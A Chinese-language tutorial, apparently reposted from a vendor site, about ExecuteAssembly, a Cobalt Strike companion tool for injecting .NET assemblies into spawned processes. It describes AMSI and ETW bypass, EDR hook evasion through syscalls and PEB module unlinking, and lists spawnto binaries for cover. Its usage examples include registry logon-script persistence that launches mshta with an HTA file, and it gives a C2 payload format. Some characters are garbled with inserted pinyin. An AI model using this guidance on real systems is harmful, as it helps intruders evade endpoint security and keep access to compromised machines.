怎么使用ExecuteAssembly實現(xiàn).NET程序加載和注入

這篇文章主要講解了“怎么使用ExecuteAssembly實現(xiàn).NET程序加載和注入”，文中的講解內(nèi)容簡單清晰，易于學習與理解，下面請大家跟著小編的思路慢慢深入，一起來研究和學習“怎么使用ExecuteAssembly實現(xiàn).NET程序加載和注入”吧！

關于ExecuteAssembly

ExecuteAssembly是CS可執(zhí)行組件的一個替代方案，ExecuteAssembly基于C/C++構建，可以幫助廣大研究人員實現(xiàn).NET程序集的加載和注入。ExecuteAssembly復用了主機進程spawnto來加載CLR模塊/AppDomainManager，Stomping加載器/.NET程序集PE DOS頭，并卸載了.NET相關模塊，以實現(xiàn)ETW+AMSI繞過。除此之外，它還能夠繞過基于NT靜態(tài)系統(tǒng)調(diào)用的EDR鉤子，以及通過動態(tài)解析API（superfasthash哈希算法）實現(xiàn)隱藏導入。

功能介紹

從PEB數(shù)據(jù)結構體中卸載了CLR相關模塊；

對.NET程序集和反射型DLL頭進行了流處理；

使用靜態(tài)硬編碼系統(tǒng)調(diào)用繞過EDR鉤子；

CLR “AppDomain/AppDomainManager”枚舉和重用；

WIn32 API動態(tài)解析，基于API響應哈希實現(xiàn)；

在加載.NET程序集之后實現(xiàn)AMSI和ETW修復；

.NET程序集字節(jié)解析，掃描需要加載和使用的CLR版本；

未使用GetProcAddress/LoadLibrary/GetModuleHandle以實現(xiàn)ETW繞過；

使用了v4 COM API & 反射DLL注入實現(xiàn)CLR托管；

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地：

git clone https://github.com/med0x2e/ExecuteAssembly.git

工具使用

x64(syscalls)：這個版本主要依賴于使用靜態(tài)系統(tǒng)調(diào)用來繞過EDR鉤子，你可以使用這個版本來構建x64版本的DLL（目前只支持x64）。

x86|x64(PEB)：通過遍歷PEB模塊EAP表并通過superfasthash哈希解析API，在運行時動態(tài)檢索所需的API地址。但是，這并沒有考慮kernel32.dll或ntdll.dll中EDR鉤子的設置位置，我們可以使用此版本同時生成x86和x64 DLL，或僅生成x86 DLL，并使用x64（syscalls）版本生成x64 DLL以應對常見的EDR鉤子。

使用VS2017或Windows SDK 10.0.17134.0（或兼容SDK版本）構建所需的DLL。

確保已裝好了gzip，并且確保相同目錄下已存放下列組件，并加載腳本“ExecuteAssembly.cna”：

ExecuteAssembly.cna

ExecuteAssembly-x64.dll

ExecuteAssembly-x86.dll

命令行接口選項

--dotnetassembly: .NET Assembly to load/inject.

--assemblyargs: .NET assembly arguments.

--unlink-modules: Unlink .NET related modules such as CLR/MsCoree related DLLs from PEB data structures.

--stomp-headers: Stomp .NET assembly and reflective DLL PE DOS headers.

--etw: Bypass event tracing on windows (ETW).

--amsi: Bypass AMSI.

--spawnto: Choose spawnto process, list of .NET binaries loading the CLR by default when executed:

      - PresentationHost.exe

      - stordiag.exe

      - ScriptRunner.exe

      - caitstatic.exe

      - Microsoft.Uev.SyncController.exe

      - TsWpfWrp.exe

      - UevAgentPolicyGenerator.exe

      - UevAppMonitor.exe

      - FileHistory.exe

      - UevTemplateBaselineGenerator.exe

      - UevTemplateConfigItemGenerator.exe

在默認情況下加載CLR并將其設置為spawnto（避免使用已知的LOLBins）。

工具使用樣例

ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --assemblyargs LogonSessions --unlink-modules --stomp-headers --amsi --etw --spawnto PresentationHost.exe

ExecuteAssembly --amsi --etw --unlink-modules --stomp-headers --dotnetassembly /tmp/ghostpack/SharPersist.exe --assemblyargs -t reg -c "C:\Windows\SysWow64\mshta.exe C:\Users\admin\Downloads\Test2.hta" -k logonscript -m add --spawnto FileHistory.exe

ExecuteAssembly --unlink-modules --stomp-headers --dotnetassembly /tmp/ghostpack/SharPersist.exe --assemblyargs -t reg -k "logonscript" -v "C:\Windows\SysWow64\mshta.exe C:\Users\admin\Downloads\Test.hta" -m remove --spawnto FileHistory.exe

ExecuteAssembly --unlink-modules --amsi --dotnetassembly /tmp/ghostpack/SharpWMI.exe --assemblyargs action=query computername=localhost query="select * from win32_service" --spawnto FileHistory.exe

ExecuteAssembly --amsi --etw --dotnetassembly /tmp/ghostpack/SharpWMI.exe --assemblyargs action=query query="select * from win32_process" --spawnto PresentationHost.exe

C2支持

該功能主要用于支持和測試Cobalt Strike，但是它也可以跟其他C2框架（比如MSF等）配合一起使用。但是別忘了反射DLL DLLMAIN需要以單獨一行Payload作為參數(shù)，格式如下：

AMSI_FLAG|ETW_FLAG|STOMPHEADERS_FLAG|UNLINKMODULES_FLAG|LL_FLAG.LENGTH_FLAG.B64_ENCODED_COMPRESSED_PAYLOAD [SPACE SEPARATED ARGUMENTS]

AMSI_FLAG: 0或1；

ETW_FLAG: 0或1；

STOMPHEADERS_FLAG: 0或1；

UNLINKMODULES_FLAG: 0或1；

LENGTH_FLAG: .NET程序集字節(jié)大??；

LL_FLAG: LENGTH_FLAG的長度；

B64_ENCODED_COMPRESSED_PAYLOAD: Gzip壓縮和Base64編碼的.NET程序集；

[SPACE SEPARATED ARGUMENTS]: .NET程序集參數(shù)；

感謝各位的閱讀，以上就是“怎么使用ExecuteAssembly實現(xiàn).NET程序加載和注入”的內(nèi)容了，經(jīng)過本文的學習后，相信大家對怎么使用ExecuteAssembly實現(xiàn).NET程序加載和注入這一問題有了更深刻的體會，具體使用情況還需要大家實踐驗證。這里是億速云，小編將為大家推送更多相關知識點的文章，歡迎關注！